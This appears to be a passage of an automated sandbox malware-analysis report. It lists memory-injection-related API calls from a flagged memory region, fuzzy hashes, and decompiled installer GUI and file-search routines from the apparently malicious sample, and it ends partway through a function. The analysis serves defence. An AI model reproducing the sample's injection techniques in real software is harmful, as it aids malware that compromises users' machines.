                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(?,?,?,02F45CD3,-213C6C70,02F52D38,00000000), ref: 02F54889
                                                                                      • NtAllocateVirtualMemory.NTDLL(-7E909493), ref: 02F555E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2616484454-0
                                                                                      • Opcode ID: 3afbd234381342218b2d90654377acb20a8aa1535e196fb6fcde116abc13e513
                                                                                      • Instruction ID: f50371b8f4d01613c465a1961ec8150fc7fc5033a2d20de026f98ebe6befe4c3
                                                                                      • Opcode Fuzzy Hash: 3afbd234381342218b2d90654377acb20a8aa1535e196fb6fcde116abc13e513
                                                                                      • Instruction Fuzzy Hash: 2F914632A09359CFDB309E649C607EA77A2FF567E4F95451ADE499B200C7318A81CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 89228f478683897c53fb3703876bb5f0a4a123265d083c9466bf266b819d443e
                                                                                      • Instruction ID: 1f5e30903c23c434af44835389052536e4cab6d698477326f60489e6e9008939
                                                                                      • Opcode Fuzzy Hash: 89228f478683897c53fb3703876bb5f0a4a123265d083c9466bf266b819d443e
                                                                                      • Instruction Fuzzy Hash: 60B1F037605A419FE3018AB8A4556A2BB62EE416F0BB40FA7DB53CF581C72750B3CBC5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtResumeThread.NTDLL(-280B34B8,A6C9A092,-1063CDC7,0000F7DB,52765AC1,B4AE4544), ref: 02F5799A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: a9ccd2b095f85c7cd342ab9b368f435c3368ffea4efb7efbfcc1aee76b001dcc
                                                                                      • Instruction ID: ebc68d64ca6e15b9ae622792722125894b855b9b553773f566d306c1bc53ceea
                                                                                      • Opcode Fuzzy Hash: a9ccd2b095f85c7cd342ab9b368f435c3368ffea4efb7efbfcc1aee76b001dcc
                                                                                      • Instruction Fuzzy Hash: 9301B536705759CECB28AD348E947E9B752AF893D4F65422ACF068B248D3348645CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • NtProtectVirtualMemory.NTDLL(-00000001266A15CF,?,?,?,?,02F564A8,-3BF98FE2,02F467A4), ref: 02F57249
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, Offset: 02F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_2f40000_xcVh7ZmH4Y.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MemoryProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2706961497-0
                                                                                      • Opcode ID: 682ce71800485db04d7fc49ca770b7a9459893514f957d6aea8b44c7349824da
                                                                                      • Instruction ID: 3f999520c6e12a9e397bcbd06d00cf21a607a79381284804f882796b909ecd67
                                                                                      • Opcode Fuzzy Hash: 682ce71800485db04d7fc49ca770b7a9459893514f957d6aea8b44c7349824da
                                                                                      • Instruction Fuzzy Hash: DE011AB6B042859FEB34CE68CD58BDA76E6AFC8750F05812AEC1DDB308D631DA118B50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 41%
                                                                                      			E0040290B(short __ebx, short* __edi) {
                                                                                      				void* _t8;
                                                                                      				void* _t21;
                                                                                      
                                                                                      				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
                                                                                      				if(_t8 != 0xffffffff) {
                                                                                      					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                                      					_push(_t21 - 0x2b0);
                                                                                      					_push(__edi);
                                                                                      					E0040653D();
                                                                                      				} else {
                                                                                      					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                                      					 *__edi = __ebx;
                                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                                      				return 0;
                                                                                      			}






                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                      • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                      • Opcode Fuzzy Hash: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                                                      • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 84%
                                                                                      			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                      				struct HWND__* _v28;
                                                                                      				void* _v84;
                                                                                      				void* _v88;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t34;
                                                                                      				signed int _t36;
                                                                                      				signed int _t38;
                                                                                      				struct HWND__* _t48;
                                                                                      				signed int _t67;
                                                                                      				struct HWND__* _t73;
                                                                                      				signed int _t86;
                                                                                      				struct HWND__* _t91;
                                                                                      				signed int _t99;
                                                                                      				int _t103;
                                                                                      				signed int _t117;
                                                                                      				int _t118;
                                                                                      				int _t122;
                                                                                      				signed int _t124;
                                                                                      				struct HWND__* _t127;
                                                                                      				struct HWND__* _t128;
                                                                                      				int _t129;
                                                                                      				intOrPtr _t130;
                                                                                      				long _t133;
                                                                                      				int _t135;
                                                                                      				int _t136;
                                                                                      				void* _t137;
                                                                                      				void* _t145;
                                                                                      
                                                                                      				_t130 = _a8;
                                                                                      				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                      					_t34 = _a12;
                                                                                      					_t127 = _a4;
                                                                                      					__eflags = _t130 - 0x110;
                                                                                      					 *0x42d250 = _t34;
                                                                                      					if(_t130 == 0x110) {
                                                                                      						 *0x434f08 = _t127;
                                                                                      						 *0x42d264 = GetDlgItem(_t127, 1);
                                                                                      						_t91 = GetDlgItem(_t127, 2);
                                                                                      						_push(0xffffffff);
                                                                                      						_push(0x1c);
                                                                                      						 *0x42b230 = _t91;
                                                                                      						E00404499(_t127);
                                                                                      						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                                                      						 *0x433ecc = E0040140B(4);
                                                                                      						_t34 = 1;
                                                                                      						__eflags = 1;
                                                                                      						 *0x42d250 = 1;
                                                                                      					}
                                                                                      					_t124 =  *0x40a368; // 0x0
                                                                                      					_t136 = 0;
                                                                                      					_t133 = (_t124 << 6) +  *0x434f20;
                                                                                      					__eflags = _t124;
                                                                                      					if(_t124 < 0) {
                                                                                      						L36:
                                                                                      						E004044E5(0x40b);
                                                                                      						while(1) {
                                                                                      							_t36 =  *0x42d250;
                                                                                      							 *0x40a368 =  *0x40a368 + _t36;
                                                                                      							_t133 = _t133 + (_t36 << 6);
                                                                                      							_t38 =  *0x40a368; // 0x0
                                                                                      							__eflags = _t38 -  *0x434f24;
                                                                                      							if(_t38 ==  *0x434f24) {
                                                                                      								E0040140B(1);
                                                                                      							}
                                                                                      							__eflags =  *0x433ecc - _t136;
                                                                                      							if( *0x433ecc != _t136) {
                                                                                      								break;
                                                                                      							}
                                                                                      							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                                                      							if(__eflags >= 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t117 =  *(_t133 + 0x14);
                                                                                      							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                      							_push(0xfffffc19);
                                                                                      							E00404499(_t127);
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                      							_push(0xfffffc1b);
                                                                                      							E00404499(_t127);
                                                                                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                      							_push(0xfffffc1a);
                                                                                      							E00404499(_t127);
                                                                                      							_t48 = GetDlgItem(_t127, 3);
                                                                                      							__eflags =  *0x434f8c - _t136;
                                                                                      							_v28 = _t48;
                                                                                      							if( *0x434f8c != _t136) {
                                                                                      								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                      								__eflags = _t117;
                                                                                      							}
                                                                                      							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                                      							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                                      							E004044BB(_t117 & 0x00000002);
                                                                                      							_t118 = _t117 & 0x00000004;
                                                                                      							EnableWindow( *0x42b230, _t118);
                                                                                      							__eflags = _t118 - _t136;
                                                                                      							if(_t118 == _t136) {
                                                                                      								_push(1);
                                                                                      							} else {
                                                                                      								_push(_t136);
                                                                                      							}
                                                                                      							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                      							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                      							__eflags =  *0x434f8c - _t136;
                                                                                      							if( *0x434f8c == _t136) {
                                                                                      								_push( *0x42d264);
                                                                                      							} else {
                                                                                      								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                      								_push( *0x42b230);
                                                                                      							}
                                                                                      							E004044CE();
                                                                                      							E0040653D(0x42d268, E00403F7B());
                                                                                      							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                      							SetWindowTextW(_t127, 0x42d268); // executed
                                                                                      							_push(_t136);
                                                                                      							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                      							__eflags = _t67;
                                                                                      							if(_t67 != 0) {
                                                                                      								continue;
                                                                                      							} else {
                                                                                      								__eflags =  *_t133 - _t136;
                                                                                      								if( *_t133 == _t136) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								__eflags =  *(_t133 + 4) - 5;
                                                                                      								if( *(_t133 + 4) != 5) {
                                                                                      									DestroyWindow( *0x433ed8); // executed
                                                                                      									 *0x42c240 = _t133;
                                                                                      									__eflags =  *_t133 - _t136;
                                                                                      									if( *_t133 <= _t136) {
                                                                                      										goto L60;
                                                                                      									}
                                                                                      									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                                                      									__eflags = _t73 - _t136;
                                                                                      									 *0x433ed8 = _t73;
                                                                                      									if(_t73 == _t136) {
                                                                                      										goto L60;
                                                                                      									}
                                                                                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                      									_push(6);
                                                                                      									E00404499(_t73);
                                                                                      									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                      									ScreenToClient(_t127, _t137 + 0x10);
                                                                                      									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                      									_push(_t136);
                                                                                      									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                      									__eflags =  *0x433ecc - _t136;
                                                                                      									if( *0x433ecc != _t136) {
                                                                                      										goto L63;
                                                                                      									}
                                                                                      									ShowWindow( *0x433ed8, 8); // executed
                                                                                      									E004044E5(0x405);
                                                                                      									goto L60;
                                                                                      								}
                                                                                      								__eflags =  *0x434f8c - _t136;
                                                                                      								if( *0x434f8c != _t136) {
                                                                                      									goto L63;
                                                                                      								}
                                                                                      								__eflags =  *0x434f80 - _t136;
                                                                                      								if( *0x434f80 != _t136) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L63;
                                                                                      							}
                                                                                      						}
                                                                                      						DestroyWindow( *0x433ed8);
                                                                                      						 *0x434f08 = _t136;
                                                                                      						EndDialog(_t127,  *0x42ba38);
                                                                                      						goto L60;
                                                                                      					} else {
                                                                                      						__eflags = _t34 - 1;
                                                                                      						if(_t34 != 1) {
                                                                                      							L35:
                                                                                      							__eflags =  *_t133 - _t136;
                                                                                      							if( *_t133 == _t136) {
                                                                                      								goto L63;
                                                                                      							}
                                                                                      							goto L36;
                                                                                      						}
                                                                                      						_push(0);
                                                                                      						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                      						__eflags = _t86;
                                                                                      						if(_t86 == 0) {
                                                                                      							goto L35;
                                                                                      						}
                                                                                      						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                                                      						__eflags =  *0x433ecc;
                                                                                      						return 0 |  *0x433ecc == 0x00000000;
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t127 = _a4;
                                                                                      					_t136 = 0;
                                                                                      					if(_t130 == 0x47) {
                                                                                      						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                                                      					}
                                                                                      					_t122 = _a12;
                                                                                      					if(_t130 != 5) {
                                                                                      						L8:
                                                                                      						if(_t130 != 0x40d) {
                                                                                      							__eflags = _t130 - 0x11;
                                                                                      							if(_t130 != 0x11) {
                                                                                      								__eflags = _t130 - 0x111;
                                                                                      								if(_t130 != 0x111) {
                                                                                      									goto L28;
                                                                                      								}
                                                                                      								_t135 = _t122 & 0x0000ffff;
                                                                                      								_t128 = GetDlgItem(_t127, _t135);
                                                                                      								__eflags = _t128 - _t136;
                                                                                      								if(_t128 == _t136) {
                                                                                      									L15:
                                                                                      									__eflags = _t135 - 1;
                                                                                      									if(_t135 != 1) {
                                                                                      										__eflags = _t135 - 3;
                                                                                      										if(_t135 != 3) {
                                                                                      											_t129 = 2;
                                                                                      											__eflags = _t135 - _t129;
                                                                                      											if(_t135 != _t129) {
                                                                                      												L27:
                                                                                      												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                                                      												goto L28;
                                                                                      											}
                                                                                      											__eflags =  *0x434f8c - _t136;
                                                                                      											if( *0x434f8c == _t136) {
                                                                                      												_t99 = E0040140B(3);
                                                                                      												__eflags = _t99;
                                                                                      												if(_t99 != 0) {
                                                                                      													goto L28;
                                                                                      												}
                                                                                      												 *0x42ba38 = 1;
                                                                                      												L23:
                                                                                      												_push(0x78);
                                                                                      												L24:
                                                                                      												E00404472();
                                                                                      												goto L28;
                                                                                      											}
                                                                                      											E0040140B(_t129);
                                                                                      											 *0x42ba38 = _t129;
                                                                                      											goto L23;
                                                                                      										}
                                                                                      										__eflags =  *0x40a368 - _t136; // 0x0
                                                                                      										if(__eflags <= 0) {
                                                                                      											goto L27;
                                                                                      										}
                                                                                      										_push(0xffffffff);
                                                                                      										goto L24;
                                                                                      									}
                                                                                      									_push(_t135);
                                                                                      									goto L24;
                                                                                      								}
                                                                                      								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                      								_t103 = IsWindowEnabled(_t128);
                                                                                      								__eflags = _t103;
                                                                                      								if(_t103 == 0) {
                                                                                      									L63:
                                                                                      									return 0;
                                                                                      								}
                                                                                      								goto L15;
                                                                                      							}
                                                                                      							SetWindowLongW(_t127, _t136, _t136);
                                                                                      							return 1;
                                                                                      						}
                                                                                      						DestroyWindow( *0x433ed8);
                                                                                      						 *0x433ed8 = _t122;
                                                                                      						L60:
                                                                                      						_t145 =  *0x42f268 - _t136; // 0x1
                                                                                      						if(_t145 == 0 &&  *0x433ed8 != _t136) {
                                                                                      							ShowWindow(_t127, 0xa); // executed
                                                                                      							 *0x42f268 = 1;
                                                                                      						}
                                                                                      						goto L63;
                                                                                      					} else {
                                                                                      						asm("sbb eax, eax");
                                                                                      						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                                                      						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                      							L28:
                                                                                      							return E00404500(_a8, _t122, _a16);
                                                                                      						} else {
                                                                                      							ShowWindow(_t127, 4);
                                                                                      							goto L8;
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}
































                                                                                      0x00404246
                                                                                      0x0040424e
                                                                                      0x00404254
                                                                                      0x0040425a
                                                                                      0x0040425e
                                                                                      0x00404265
                                                                                      0x00404265
                                                                                      0x00404265
                                                                                      0x0040426f
                                                                                      0x00404281
                                                                                      0x0040428d
                                                                                      0x00404292
                                                                                      0x0040429c
                                                                                      0x004042a2
                                                                                      0x004042a4
                                                                                      0x004042a9
                                                                                      0x004042a6
                                                                                      0x004042a6
                                                                                      0x004042a6
                                                                                      0x004042b9
                                                                                      0x004042d1
                                                                                      0x004042d3
                                                                                      0x004042d9
                                                                                      0x004042ee
                                                                                      0x004042db
                                                                                      0x004042e4
                                                                                      0x004042e6
                                                                                      0x004042e6
                                                                                      0x004042f4
                                                                                      0x00404305
                                                                                      0x0040431b
                                                                                      0x00404322
                                                                                      0x00404328
                                                                                      0x0040432c
                                                                                      0x00404331
                                                                                      0x00404333
                                                                                      0x00000000
                                                                                      0x00404339
                                                                                      0x00404339
                                                                                      0x0040433b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404341
                                                                                      0x00404345
                                                                                      0x0040436a
                                                                                      0x00404370
                                                                                      0x00404376
                                                                                      0x00404378
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040439e
                                                                                      0x004043a4
                                                                                      0x004043a6
                                                                                      0x004043ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004043b1
                                                                                      0x004043b4
                                                                                      0x004043b7
                                                                                      0x004043ce
                                                                                      0x004043da
                                                                                      0x004043f3
                                                                                      0x004043f9
                                                                                      0x004043fd
                                                                                      0x00404402
                                                                                      0x00404408
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404412
                                                                                      0x0040441d
                                                                                      0x00000000
                                                                                      0x0040441d
                                                                                      0x00404347
                                                                                      0x0040434d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404353
                                                                                      0x00404359
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040435f
                                                                                      0x00404333
                                                                                      0x0040442a
                                                                                      0x00404436
                                                                                      0x0040443d
                                                                                      0x00000000
                                                                                      0x00404188
                                                                                      0x00404188
                                                                                      0x0040418b
                                                                                      0x004041be
                                                                                      0x004041be
                                                                                      0x004041c0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004041c0
                                                                                      0x0040418d
                                                                                      0x00404191
                                                                                      0x00404196
                                                                                      0x00404198
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004041a8
                                                                                      0x004041b0
                                                                                      0x00000000
                                                                                      0x004041b6
                                                                                      0x00403fbe
                                                                                      0x00403fbe
                                                                                      0x00403fc2
                                                                                      0x00403fc7
                                                                                      0x00403fd6
                                                                                      0x00403fd6
                                                                                      0x00403fdc
                                                                                      0x00403fe3
                                                                                      0x00404027
                                                                                      0x0040402d
                                                                                      0x00404046
                                                                                      0x00404049
                                                                                      0x0040405c
                                                                                      0x00404062
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404068
                                                                                      0x00404073
                                                                                      0x00404075
                                                                                      0x00404077
                                                                                      0x00404096
                                                                                      0x00404096
                                                                                      0x00404099
                                                                                      0x0040409e
                                                                                      0x004040a1
                                                                                      0x004040b1
                                                                                      0x004040b2
                                                                                      0x004040b4
                                                                                      0x004040ea
                                                                                      0x004040fa
                                                                                      0x00000000
                                                                                      0x004040fa
                                                                                      0x004040b6
                                                                                      0x004040bc
                                                                                      0x004040d5
                                                                                      0x004040da
                                                                                      0x004040dc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004040de
                                                                                      0x004040ca
                                                                                      0x004040ca
                                                                                      0x004040cc
                                                                                      0x004040cc
                                                                                      0x00000000
                                                                                      0x004040cc
                                                                                      0x004040bf
                                                                                      0x004040c4
                                                                                      0x00000000
                                                                                      0x004040c4
                                                                                      0x004040a3
                                                                                      0x004040a9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004040ab
                                                                                      0x00000000
                                                                                      0x004040ab
                                                                                      0x0040409b
                                                                                      0x00000000
                                                                                      0x0040409b
                                                                                      0x00404081
                                                                                      0x00404088
                                                                                      0x0040408e
                                                                                      0x00404090
                                                                                      0x00404466
                                                                                      0x00000000
                                                                                      0x00404466
                                                                                      0x00000000
                                                                                      0x00404090
                                                                                      0x0040404e
                                                                                      0x00000000
                                                                                      0x00404056
                                                                                      0x00404035
                                                                                      0x0040403b
                                                                                      0x00404443
                                                                                      0x00404443
                                                                                      0x00404449
                                                                                      0x00404456
                                                                                      0x0040445c
                                                                                      0x0040445c
                                                                                      0x00000000
                                                                                      0x00403fe5
                                                                                      0x00403fea
                                                                                      0x00403ff6
                                                                                      0x00403fff
                                                                                      0x00404100
                                                                                      0x00000000
                                                                                      0x0040401e
                                                                                      0x00404021
                                                                                      0x00000000
                                                                                      0x00404021
                                                                                      0x00403fff
                                                                                      0x00403fe3

                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                      • ShowWindow.USER32(?), ref: 00403FF6
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                      • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                      • DestroyWindow.USER32 ref: 00404035
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                      • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                      • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                      • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                      • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                      • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 121052019-0
                                                                                      • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                      • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                      • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                      • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cc6 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 325 403ccb-403cd4 321->325 325->320 328 403cd6-403cda 325->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 344 403df3-403df6 330->344 345 403dfb-403e06 call 403ec2 330->345 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->339 347->348 348->339 360 403e32-403e44 GetClassInfoW 354->360 361 403e28-403e2d call 40689a 354->361 359 403e95-403e97 355->359 362 403eb1-403eb3 call 40140b 359->362 363 403e99-403e9f 359->363 367 403e46-403e56 GetClassInfoW RegisterClassW 360->367 368 403e5c-403e7f DialogBoxParamW call 40140b 360->368 361->360 362->335 363->344 364 403ea5-403eac call 40140b 363->364 364->344 367->368 372 403e84-403e8d call 403b3c 368->372 372->338
                                                                                      C-Code - Quality: 96%
                                                                                      			E00403BEC(void* __eflags) {
                                                                                      				intOrPtr _v4;
                                                                                      				intOrPtr _v8;
                                                                                      				int _v12;
                                                                                      				void _v16;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t22;
                                                                                      				void* _t30;
                                                                                      				void* _t32;
                                                                                      				int _t33;
                                                                                      				void* _t36;
                                                                                      				int _t39;
                                                                                      				int _t40;
                                                                                      				int _t44;
                                                                                      				short _t63;
                                                                                      				WCHAR* _t65;
                                                                                      				signed char _t69;
                                                                                      				WCHAR* _t76;
                                                                                      				intOrPtr _t82;
                                                                                      				WCHAR* _t87;
                                                                                      
                                                                                      				_t82 =  *0x434f10;
                                                                                      				_t22 = E0040690A(2);
                                                                                      				_t90 = _t22;
                                                                                      				if(_t22 == 0) {
                                                                                      					_t76 = 0x42d268;
                                                                                      					L"1033" = 0x30;
                                                                                      					 *0x442002 = 0x78;
                                                                                      					 *0x442004 = 0;
